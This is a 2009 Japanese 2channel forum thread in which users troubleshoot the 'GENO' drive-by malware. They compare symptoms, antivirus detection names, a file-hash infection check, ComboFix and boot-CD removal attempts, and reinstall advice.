ほっといた場合>>159のパソコン経由で悪さされるかも
でも最インスコすれば失った時間と消すことになるデータ以外は解決
ほっといた場合>>159のパソコン経由で悪さされるかも
166 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:12:40
c:\windows\system32\sqlsodbc.chm
のsqlsodbc.chmが見つからない!
osはXP sp3 何かソフトいれないとだめなの?
のsqlsodbc.chmが見つからない!
osはXP sp3 何かソフトいれないとだめなの?
167 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:12:56
168 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:15:19
>>159
このスレの最初からレスを追って貰えば判ると思うけど、
食らった際に実際にどんなデータが盗み出されたりするかとか、
その辺の詳細まではまだ残念ながらわかってないよ。
あくまで一般論でいえばWindowsのプロダクトキーだとか
Windowsインスコ時に入れた利用者名とか、
なんかのID/パスワードとか
レジストリ内に記録/保存されているデータだったりする事が往々にしてあるって感じ。
それに、クリーンインストールやリカバリをしないと
キーロガータイプのウィルスが常駐し続けて、
コピペしようとした内容とかサイト等でフォームに入力したデータ等が
逐一クラッカーの元に送り届けられてしまう事も考えられる。
とにかく、最終的にはクリーンインストールかリカバリしないと駄目です。絶対に。
このスレの最初からレスを追って貰えば判ると思うけど、
食らった際に実際にどんなデータが盗み出されたりするかとか、
その辺の詳細まではまだ残念ながらわかってないよ。
あくまで一般論でいえばWindowsのプロダクトキーだとか
Windowsインスコ時に入れた利用者名とか、
なんかのID/パスワードとか
レジストリ内に記録/保存されているデータだったりする事が往々にしてあるって感じ。
それに、クリーンインストールやリカバリをしないと
キーロガータイプのウィルスが常駐し続けて、
コピペしようとした内容とかサイト等でフォームに入力したデータ等が
逐一クラッカーの元に送り届けられてしまう事も考えられる。
とにかく、最終的にはクリーンインストールかリカバリしないと駄目です。絶対に。
169 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:15:40
>165
再インスコ前に、
専ブラのログ、各種アプリ設定ファイル、エロ画像
諸々バックアップしときたいんだけど、
それにもウィルスくっ付いてくる可能性はある?
再インスコ前に、
専ブラのログ、各種アプリ設定ファイル、エロ画像
諸々バックアップしときたいんだけど、
それにもウィルスくっ付いてくる可能性はある?
170 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:15:46
俺のsqlsodbcは更新が2002年8月31日、21:00:00だぜ
ところでTCPMonitorでdpupdchk.exeがラトビアに接続しているように見えたので終了したけど
誰か同じ人いる?
ところでTCPMonitorでdpupdchk.exeがラトビアに接続しているように見えたので終了したけど
誰か同じ人いる?
171 :162:2009/04/09(木) 00:19:10
sqlsodbc.chmは
サイズ 1,323バイト
ディスク上のサイズが 4,096バイト
サイズ 1,323バイト
ディスク上のサイズが 4,096バイト
172 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:20:38
173 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:21:11
174 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:21:34
175 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:22:34
>>148
イサキを思い出す。
人柱になった人、感染後に Symantec で Trojan.KillAV を検出してる人いない?
俺の会社で数台のPCが「IEが落ちまくる」「OEが落ちまくる」という症状がちょっと前から出てて
ようやく4/7付けの定義ファイルで Trojan.KillAV を検出してくれたんよ。
それまではまったく検出なし。
他の症状としてはコマンドプロンプト・レジストリエディタを起動するとExplorerが死ぬっていうのもあった。
ログオン後にExplorerが起動せずデスクトップが真っ青のまま(Explorerを起動するとアイコンとタスクバー登場)という
ものもあった。
sqlsodbc.chmはまだ調べてないけど問題の出たWindows機はまだフォーマットかけてないので
明日調べてみるよ。
イサキを思い出す。
人柱になった人、感染後に Symantec で Trojan.KillAV を検出してる人いない?
俺の会社で数台のPCが「IEが落ちまくる」「OEが落ちまくる」という症状がちょっと前から出てて
ようやく4/7付けの定義ファイルで Trojan.KillAV を検出してくれたんよ。
それまではまったく検出なし。
他の症状としてはコマンドプロンプト・レジストリエディタを起動するとExplorerが死ぬっていうのもあった。
ログオン後にExplorerが起動せずデスクトップが真っ青のまま(Explorerを起動するとアイコンとタスクバー登場)という
ものもあった。
sqlsodbc.chmはまだ調べてないけど問題の出たWindows機はまだフォーマットかけてないので
明日調べてみるよ。
176 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:23:00
有名な店だから決行感染してるんじゃないか
感染にすら気づいてない奴がほとんどだと思う
感染にすら気づいてない奴がほとんどだと思う
177 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:25:27
>>169
各種アプリ設定以外は気にせずバックアップしていいと思う。
各種アプリ設定は気をつけたほうがいい
このウィルスについては完全に不明だけどUSB挿すだけで
USBに感染するやつがあるからバックアップのとり方には細心の注意を
ありきたりの事しかいえなくてすまないね
各種アプリ設定以外は気にせずバックアップしていいと思う。
各種アプリ設定は気をつけたほうがいい
このウィルスについては完全に不明だけどUSB挿すだけで
USBに感染するやつがあるからバックアップのとり方には細心の注意を
ありきたりの事しかいえなくてすまないね
178 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:26:42
流れをまとめるとこんな感じであってるだろうか
http://www29.atwiki.jp/geno/pages/14.html
http://www29.atwiki.jp/geno/pages/14.html
179 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:27:27
180 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:27:38
ちょ、パピーヌとクレストロンジャパンはまだサイト閉じてないのかw
>175
今履歴見てみたら、
BAT.trojanってのがあった。
ノートン先生が遮断してくれたみたいで、
tempフォルダから見つかってる。
今履歴見てみたら、
BAT.trojanってのがあった。
ノートン先生が遮断してくれたみたいで、
tempフォルダから見つかってる。
182 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:28:50
ちなみにIE8でXPのSP3です
news/?id=2に行ったけどPDFは起動しませんでした
news/?id=2に行ったけどPDFは起動しませんでした
184 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:31
>>174
改変されてないみたいですね
改変されてないみたいですね
185 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:36
会社の数台のPCが感染してるってのは奇妙だな
まさか全てのPCがGENOやjuicyrock開いたわけでもないだろうし
まさか全てのPCがGENOやjuicyrock開いたわけでもないだろうし
186 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:30:47
http://pc11.2ch.net/test/read.cgi/pc/1239197673/39
39 :名無しさん :sage :2009/04/09(木) 00:14:21 0
前スレの958です。
combofixで検疫したファイルをVirustotalでスキャンしてみた。
ファイル名 _ycmmf_.cjq.zip 受理 2009.04.08 17:04:29 (CET)
現在の状態: 読込み中 ... 順番待ち 待機中 スキャン中 完了 発見せず 停止
結果: 7/40 (17.5%)
検知できたのは以下の7つのウィルス対策ソフトだけでした。
AntiVir TR/Agent.caaj.B
Avast Win32:Trojan-gen {Other}
eTrust-Vet Win32/SillyDl.HDU
GData Win32:Trojan-gen {Other}
McAfee-GW-Edition Trojan.Agent.caaj.B
NOD32 variant of Win32/Delf.OEX
Prevx1 High Risk Cloaked Malware
AVGもカスペルスキーもダメでした。
39 :名無しさん :sage :2009/04/09(木) 00:14:21 0
前スレの958です。
combofixで検疫したファイルをVirustotalでスキャンしてみた。
ファイル名 _ycmmf_.cjq.zip 受理 2009.04.08 17:04:29 (CET)
現在の状態: 読込み中 ... 順番待ち 待機中 スキャン中 完了 発見せず 停止
結果: 7/40 (17.5%)
検知できたのは以下の7つのウィルス対策ソフトだけでした。
AntiVir TR/Agent.caaj.B
Avast Win32:Trojan-gen {Other}
eTrust-Vet Win32/SillyDl.HDU
GData Win32:Trojan-gen {Other}
McAfee-GW-Edition Trojan.Agent.caaj.B
NOD32 variant of Win32/Delf.OEX
Prevx1 High Risk Cloaked Malware
AVGもカスペルスキーもダメでした。
187 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:31:39
そうそう、それと感染中っつか発症中のコンピュータで
C:\WINDOWS\ 直下や C:\Documents and Settings\username\Local Settings\ 直下に
ファイルが生成され、先生はそれを Trojan.KillAV として検出してた。
で、さっさと検疫に移動させるんだけど次から次へと同じファイルが生成されて
検出リストがエラいことにwww
作成ユーザーが、ログオンユーザー以外に SYSTEM とか NETWORK SERVICE とかもいてフイタw
もう俺の手には負えないって素直に負けを認めたwwwww
C:\WINDOWS\ 直下や C:\Documents and Settings\username\Local Settings\ 直下に
ファイルが生成され、先生はそれを Trojan.KillAV として検出してた。
で、さっさと検疫に移動させるんだけど次から次へと同じファイルが生成されて
検出リストがエラいことにwww
作成ユーザーが、ログオンユーザー以外に SYSTEM とか NETWORK SERVICE とかもいてフイタw
もう俺の手には負えないって素直に負けを認めたwwwww
188 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:31:46
189 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:33:00
190 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:33:36
191 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:33:51
******まとめ*******
感染確認方法
・sqlsodbc.chmのハッシュを調べて
F639AFDE02547603A3D3930EE4BF8C12
と異なる値が出た場合感染してる可能性あり
・以下のサイト(有名な駆除ツール)にアクセスできなければ危険
(鯖落ちじゃない限り、ほぼ感染してると見て問題ないと思う)
ttp://download.bleepingcomputer.com/sUBs/ComboFix.exe
・パソコン再起動後、regedit.exeを起動しようとすると
explorerが落ちる場合、確実に感染してます。
・ブラウジングがまともにできない
駆除方法
完全な駆除方法は今のところない。(断定するのは現段階では危険)
セーフモードで、ComboFixを実行すればある程度よくなるかもしれない程度。
以上の問題が解決していればある程度よくなってるかも。
感染確認方法
・sqlsodbc.chmのハッシュを調べて
F639AFDE02547603A3D3930EE4BF8C12
と異なる値が出た場合感染してる可能性あり
・以下のサイト(有名な駆除ツール)にアクセスできなければ危険
(鯖落ちじゃない限り、ほぼ感染してると見て問題ないと思う)
ttp://download.bleepingcomputer.com/sUBs/ComboFix.exe
・パソコン再起動後、regedit.exeを起動しようとすると
explorerが落ちる場合、確実に感染してます。
・ブラウジングがまともにできない
駆除方法
完全な駆除方法は今のところない。(断定するのは現段階では危険)
セーフモードで、ComboFixを実行すればある程度よくなるかもしれない程度。
以上の問題が解決していればある程度よくなってるかも。
192 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:34:02
>>185
どこのサイトとは言えないけれど、ヤられたサイトを開いた覚えがある、っていう証言はあるんだわ。
で、ちょっと疑問なのが、問題が発生し始めたのが3月末っていうこと。
GENOウイルスが騒がれ始めたのは4月に入ってからだし、
もしかすると会社の数台のPCは今回のGENOウイルスとは関係ないのかも試練。
とりあえずログは漁ってみるけどねー
どこのサイトとは言えないけれど、ヤられたサイトを開いた覚えがある、っていう証言はあるんだわ。
で、ちょっと疑問なのが、問題が発生し始めたのが3月末っていうこと。
GENOウイルスが騒がれ始めたのは4月に入ってからだし、
もしかすると会社の数台のPCは今回のGENOウイルスとは関係ないのかも試練。
とりあえずログは漁ってみるけどねー
193 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:34:35
194 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:36:33
195 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:37:08
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
http://tsushima.2ch.net/test/read.cgi/news/1239178101/527
527 名前: ジョウシュウアズマギク(新潟県)[sage] 投稿日:2009/04/09(木) 00:31:39.93 ID:35GKJh/C
avastはさっきの更新で駆除まで出来るみたいだけど、
亜種に対してどうなのかは不明
誰か踏んでみてくれ 俺は嫌だ
avastで駆除できんの?
http://tsushima.2ch.net/test/read.cgi/news/1239178101/527
527 名前: ジョウシュウアズマギク(新潟県)[sage] 投稿日:2009/04/09(木) 00:31:39.93 ID:35GKJh/C
avastはさっきの更新で駆除まで出来るみたいだけど、
亜種に対してどうなのかは不明
誰か踏んでみてくれ 俺は嫌だ
avastで駆除できんの?
196 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:37:11
>>191
regedit 以外に、cmd も同様の症状でないかな?
regedit.exe をコピーして違う名前(aaaaaaaa.exeとか)にすると起動できるんよね。
コピー 〜 regedit.exe では explorer が落ちるわ。
regedit 以外に、cmd も同様の症状でないかな?
regedit.exe をコピーして違う名前(aaaaaaaa.exeとか)にすると起動できるんよね。
コピー 〜 regedit.exe では explorer が落ちるわ。
197 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:37:19
>>187
それ、セーフモードやUbuntuCDでも削除できなかったけど
Bart'sPEというソフトで作成した起動CDで,C:\Windows直下からは削除出来たよ。
でその後はC:\RECYCLERフォルダ内へ名前を変えて移動してるので、そいつも削除したら
取りあえず何とかなるかも・・・
それ、セーフモードやUbuntuCDでも削除できなかったけど
Bart'sPEというソフトで作成した起動CDで,C:\Windows直下からは削除出来たよ。
でその後はC:\RECYCLERフォルダ内へ名前を変えて移動してるので、そいつも削除したら
取りあえず何とかなるかも・・・
198 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:38:39
199 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:39:53
200 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:40:10
>>197
d
Bart'sPEか。調べてみて時間が取れればチャレンジしてみるよ。
まあどのみち感染PCはフォーマットかけて再インスココースなんだけどね。
消す前に調べられる(&試せる)ことはやっておきたいなー。
d
Bart'sPEか。調べてみて時間が取れればチャレンジしてみるよ。
まあどのみち感染PCはフォーマットかけて再インスココースなんだけどね。
消す前に調べられる(&試せる)ことはやっておきたいなー。
201 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:41:25
202 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:41:43
昨日半年ぶりくらいに以前使ってたパソコンを起動してどこのサイトも開く前に
Windowsアップデードしようとしたら失敗して再起動しようとしてら起動出来なくなったんだけど
このウイルスのせいなのかな。こんなことってありえるの?
Windowsアップデードしようとしたら失敗して再起動しようとしてら起動出来なくなったんだけど
このウイルスのせいなのかな。こんなことってありえるの?
203 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:42:28
ウイルスバスター2009は駄目駄目。
VPC上でA-SQUARED FREEで検知かかるのにバスター君は最新でも完全にスルー
気になったので、脱線してちょっと古めの検体を用意。
(BiosEdit内にトロイの木馬とバックドア付)、A-SQUARED FREEは検知するがバスター君またもやスルー
トレンドよ、最近TVCMやって拡販してるが大丈夫か?
VPC上でA-SQUARED FREEで検知かかるのにバスター君は最新でも完全にスルー
気になったので、脱線してちょっと古めの検体を用意。
(BiosEdit内にトロイの木馬とバックドア付)、A-SQUARED FREEは検知するがバスター君またもやスルー
トレンドよ、最近TVCMやって拡販してるが大丈夫か?
204 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:43:36
205 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:43:44
>>192
海外では3月28日の報告があるみたいだ。
思ったより早く攻撃が始まっていたのかも。
http://www.dynamicdrive.com/forums/archive/index.php/t-43390.html
海外では3月28日の報告があるみたいだ。
思ったより早く攻撃が始まっていたのかも。
http://www.dynamicdrive.com/forums/archive/index.php/t-43390.html
206 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:44:39
A-SQUARED FREEは誤検地も多いけど、ちゃんと検地してくれるのは救いだね。
名称は良く出てたやつでいいのかな
名称は良く出てたやつでいいのかな
207 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:44:46
>>205
3/28て割とビンゴなんですがw
3/28て割とビンゴなんですがw
208 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:46:28
209 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:50:27
>>185
おまいちゃんの会社のPC、PROXYかませてないの?
もしSquid等でPROXY立てて噛ませているのなら
当該PC利用者のログインID等を元にSquidのログを追えば
きっと感染源が特定出来ると思うよ。
古いログを上書きして消される前にとっとと調べたほうがいいかも。
万一取引先の会社の鯖が感染してるとか、最悪自社のイントラ鯖が感染していたら
洒落にならないよ。社内的に。
おまいちゃんの会社のPC、PROXYかませてないの?
もしSquid等でPROXY立てて噛ませているのなら
当該PC利用者のログインID等を元にSquidのログを追えば
きっと感染源が特定出来ると思うよ。
古いログを上書きして消される前にとっとと調べたほうがいいかも。
万一取引先の会社の鯖が感染してるとか、最悪自社のイントラ鯖が感染していたら
洒落にならないよ。社内的に。
210 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:51:09
10日近くたって未だに検知スルーと挙動不明ってのはキビシイな。
そんな対応遅れた記憶ないわ
そんな対応遅れた記憶ないわ
211 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:52:10
212 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:52:43
>>209
マルチ乙www
マルチ乙www
213 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:54:02
214 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:54:18
>>212
マルチじゃなくて誤爆だろw
マルチじゃなくて誤爆だろw
215 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:55:38
>>209
Proxyないんだぜwww
基本内部から外部へは全パケット通すんだぜwwwwww
以前Proxy提案したことあるけど、「インターネットが遅くなる(と利用者から苦情が来る)からダメ」って言われたんだぜwwwwwwww
うちみたいなユルユルの会社、他にあるんだろうか。
Proxyないんだぜwww
基本内部から外部へは全パケット通すんだぜwwwwww
以前Proxy提案したことあるけど、「インターネットが遅くなる(と利用者から苦情が来る)からダメ」って言われたんだぜwwwwwwww
うちみたいなユルユルの会社、他にあるんだろうか。
216 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:55:38
>>214
誤爆先がアレ過ぎて笑えないんだけどなw
誤爆先がアレ過ぎて笑えないんだけどなw
217 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:55:40
218 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:01
>>194
立った今データ実行防止でexploerが落っこちた・・・これは
立った今データ実行防止でexploerが落っこちた・・・これは
219 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:24
>>215
もしかして、あの有名な荒らし新聞社の方ですか?w
もしかして、あの有名な荒らし新聞社の方ですか?w
220 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:27
誤爆にレスした俺(´・ω・`)
221 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:56:57
222 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:57:09
223 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:57:20
224 :名無しさん@お腹いっぱい。:2009/04/09(木) 00:57:42
>>219
マスゴミなんかと一緒にしないでくれw
マスゴミなんかと一緒にしないでくれw
225 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:00:02
>>218
><
><
226 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:00:11
>>以下のサイト(有名な駆除ツール)にアクセスできなければ危険
ウイルス対策ソフトがブロックした場合は問題なし、
一部のソフトで検出しちゃうから>ComboFix
ウイルス対策ソフトがブロックした場合は問題なし、
一部のソフトで検出しちゃうから>ComboFix
227 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:01:37
bxatg.mnn(tempに落とされるやつ)
はexeファイルだな。
こいつが親玉でFAかな
はexeファイルだな。
こいつが親玉でFAかな
228 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:01:48
>221
inetnum: 114.160.0.0 - 114.191.255.255
netname: OCN
descr: NTT Communications Corporation
inetnum: 114.160.0.0 - 114.191.255.255
netname: OCN
descr: NTT Communications Corporation
229 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:02:28
230 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:02:32
>218
バッファーオーバーフロー
バッファーオーバーフロー
231 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:04:05
>>191
取り消されたアクションてなるってことは…orz
取り消されたアクションてなるってことは…orz
232 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:07:20
233 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:08:13
>>231
ご愁傷様です。
ご愁傷様です。
234 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:08:59
サイト見ただけでウイルス感染とかありえるの?
マルウェアとかスパイウェアならともかく
exe開かなきゃ大丈夫じゃないの
マルウェアとかスパイウェアならともかく
exe開かなきゃ大丈夫じゃないの
235 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:11:07
236 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:11:19
237 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:11:35
だから・・・
238 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:13:06
239 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:00
>>234
568 名前: カキツバタ(兵庫県)[] 投稿日:2009/04/09(木) 00:48:06.52 ID:vdIiBaJc
あるサイトに行っただけでウイルス感染とか信じてる
情報弱者ってまだいたんだびっくり
exe開かない限りそんなのねーから
568 名前: カキツバタ(兵庫県)[] 投稿日:2009/04/09(木) 00:48:06.52 ID:vdIiBaJc
あるサイトに行っただけでウイルス感染とか信じてる
情報弱者ってまだいたんだびっくり
exe開かない限りそんなのねーから
240 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:10
ゼロが反応とかギャグだな
241 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:18
みなさんはJavaスクリプトは通常は切っておいて必要な時だけオンにしてるんですか?
242 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:14:25
238
ちなみにそれトロ屋さんだって言われましたw
ちなみにそれトロ屋さんだって言われましたw
243 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:16:18
ていうかこのスレ読んでるのにまだゼロ使ってるのかよ
244 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:20:21
NoScriptでjsも読み込んでないし、そもそもgenoとか踏んでないし、怪しいIPは除外してるんだが
CドライブとDドライブでパーティション切ってて
DにもXP入れたんだけど認証しわすれて起動できないからデータ用にしてるのよ
でもシステムファイルとか残ってるんだが、Dはフォーマットしたほうがいいのかな
スレチな感じだけどみんな詳しそうだから質問させてください
CドライブとDドライブでパーティション切ってて
DにもXP入れたんだけど認証しわすれて起動できないからデータ用にしてるのよ
でもシステムファイルとか残ってるんだが、Dはフォーマットしたほうがいいのかな
スレチな感じだけどみんな詳しそうだから質問させてください
245 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:21:19
>>241
うちはPCの台数を物理的に増やして、2chや普通にWeb閲覧する奴を専用化して、
そのPCには個人情報からなにから一切要れずに
万一ウィルスを食らってもとっとと再インスコすれば良いだけの状況で使ってる。
その代わりJavascriptは常にオン。
で、銀行だとかネット通販で買う場合はそれ専用の別のPCを使うんだけど、
今回みたいに通販サイトでこーいう事態も起きたから、ちょっと運用を見直さないと駄目だと思ってる。
うちはPCの台数を物理的に増やして、2chや普通にWeb閲覧する奴を専用化して、
そのPCには個人情報からなにから一切要れずに
万一ウィルスを食らってもとっとと再インスコすれば良いだけの状況で使ってる。
その代わりJavascriptは常にオン。
で、銀行だとかネット通販で買う場合はそれ専用の別のPCを使うんだけど、
今回みたいに通販サイトでこーいう事態も起きたから、ちょっと運用を見直さないと駄目だと思ってる。
246 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:21:43
>241
つSleipnir
つSleipnir
247 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:22:02
>>232
regedit.exe 起動できる
sqlsodbc.chmのハッシュの見方がわからないけどサイズは49.5KB(50,727バイト)
今気づいたけどCPUの使用率が100パーセント近い…
regedit.exe 起動できる
sqlsodbc.chmのハッシュの見方がわからないけどサイズは49.5KB(50,727バイト)
今気づいたけどCPUの使用率が100パーセント近い…
248 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:22:19
>>239
さすがν速、真の情弱はν速にいるんだな
さすがν速、真の情弱はν速にいるんだな
249 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:24:11
>>247
MD5はこのソフトで確認すると楽
http://www.vector.co.jp/soft/win95/util/se368065.html
installくりっくすれば右クリックから調べられる
MD5はこのソフトで確認すると楽
http://www.vector.co.jp/soft/win95/util/se368065.html
installくりっくすれば右クリックから調べられる
250 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:27:22
>>249
これは便利で楽だな
これは便利で楽だな
251 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:28:13
不安な人のために言っておくけど
画像とか動画とかテキストファイルとかバックアップとっても
コード埋め込みとかはしないからバックアップはとってリカバリーすること
画像とか動画とかテキストファイルとかバックアップとっても
コード埋め込みとかはしないからバックアップはとってリカバリーすること
252 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:28:44
253 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:29:09
そもそもsqlsodbc.chmが全ローカルディスクに検索かけても見つからなかった
システムも全て表示させているのに
システムも全て表示させているのに
254 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:32:37
>251
感染経路ははっきりしてるのか
とりあえずバックアップ取って再インスコしてみる
感染経路ははっきりしてるのか
とりあえずバックアップ取って再インスコしてみる
255 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:32:53
256 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:33:51
>>255
djb
djb
257 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:34:44
>>244
DでOS起動しなけりゃ無問題。だと思う
DでOS起動しなけりゃ無問題。だと思う
258 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:34:54
259 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:35:19
>>255
セーフ。
セーフ。
260 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:36:10
261 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:36:41
---まとめ2---
感染経路は>>1
感染確認方法は>>191で
「sqlsodbc.chm」はsystem32にある。
MD5の確認方法は>>249
ComboFixのダウンロードリンクは場合によってはアンチウイルスに引っかかるが
これは問題なし。危険な人は"取り消されたアクション"になるか、"ページが真っ白"
駆除方法は現状なしと思ったほうが安全、つまりリカバリー
ただ>>162のようなケースも
とにかく
・感染したらリカバリー
・感染確認は>>191でMD5のとり方は>>249のソフトで右クリックから
感染経路は>>1
感染確認方法は>>191で
「sqlsodbc.chm」はsystem32にある。
MD5の確認方法は>>249
ComboFixのダウンロードリンクは場合によってはアンチウイルスに引っかかるが
これは問題なし。危険な人は"取り消されたアクション"になるか、"ページが真っ白"
駆除方法は現状なしと思ったほうが安全、つまりリカバリー
ただ>>162のようなケースも
とにかく
・感染したらリカバリー
・感染確認は>>191でMD5のとり方は>>249のソフトで右クリックから
262 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:37:30
>246
プニルって、
JSについて何か有利な点あるの?
プニルって、
JSについて何か有利な点あるの?
補足、
sqlsodbc.chmの探し方
スタート→検索→ファイルとフォルダすべて→ファイル名の一部の所に
sqlsodbc.chmと入れる→探す場所を"参照..."にしてマイコンピューターから
Windows、System32を選択
これで探してみる
sqlsodbc.chmの探し方
スタート→検索→ファイルとフォルダすべて→ファイル名の一部の所に
sqlsodbc.chmと入れる→探す場所を"参照..."にしてマイコンピューターから
Windows、System32を選択
これで探してみる
264 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:48:16
リカバリしたくないし、変な動きは無いしとりあえずアンチウイルスで駆除出来るまで放置しよう
265 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:50:44
>>252
これ凄いね。
一昨日見慣れないエラーが出たりプニルがフリーズしたんだよね…
次の日PC起動したらブルースクリーン。
ネットに繋いだらZAがjquery.jsをブロック。
>191のサイトが表示されない。
CPU使用率が高い。これ怪しいよなぁ…
低価格PCスレかグーグルの検索結果から感染したかもしれない
これ凄いね。
一昨日見慣れないエラーが出たりプニルがフリーズしたんだよね…
次の日PC起動したらブルースクリーン。
ネットに繋いだらZAがjquery.jsをブロック。
>191のサイトが表示されない。
CPU使用率が高い。これ怪しいよなぁ…
低価格PCスレかグーグルの検索結果から感染したかもしれない
266 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:55:24
267 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:56:46
268 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:57:28
>>265
hashTabで調子にのって各種ハッシュを無駄にわんさか算出するようにして使うと
ちょっと大きなファイルの算出を行う際にとんでもなく重くなって時間が掛かるのがアレだけど、
使い勝手は良いよ。お勧め。
ちなみにZAで遮断されたところで、それなりにjsを読み込んでいる筈で、
恐らくオンタイムでウィルスが動作しちゃってる筈だから
CPU使用率が高い時点で既に食らった物と見て覚悟を決めた方がいいと思うよ。
hashTabで調子にのって各種ハッシュを無駄にわんさか算出するようにして使うと
ちょっと大きなファイルの算出を行う際にとんでもなく重くなって時間が掛かるのがアレだけど、
使い勝手は良いよ。お勧め。
ちなみにZAで遮断されたところで、それなりにjsを読み込んでいる筈で、
恐らくオンタイムでウィルスが動作しちゃってる筈だから
CPU使用率が高い時点で既に食らった物と見て覚悟を決めた方がいいと思うよ。
269 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:00:44
>>267
最近のマルウェアは自身を駆除されないために有用な駆除ツールのダウンロードをブロックする
このGENOウイルスもそうするようで
サーバーの混雑とかじゃないのにダウンロード出来ない人(ページが表示されない人)はヤバいかもね
最近のマルウェアは自身を駆除されないために有用な駆除ツールのダウンロードをブロックする
このGENOウイルスもそうするようで
サーバーの混雑とかじゃないのにダウンロード出来ない人(ページが表示されない人)はヤバいかもね
270 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:12:17
432 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/09(木) 01:55:40
俺もGENOウィルスに感染したが、とりあえず元凶のウィルス本体は削除できたので報告。
まずa-squaredで検査。C:\Windows直下に変な名前のファイル(gluogug.gyd)が出来てる。
これがTROJAN-SPY.AGENT!IKと警告される。これは削除しても何遍でも復活する。
セーフモードやUbuntu起動CDから削除を試みたがそれでもダメ。
某スレで報告のあった、BART'sPEというソフトで起動CDを作成しCDから起動。
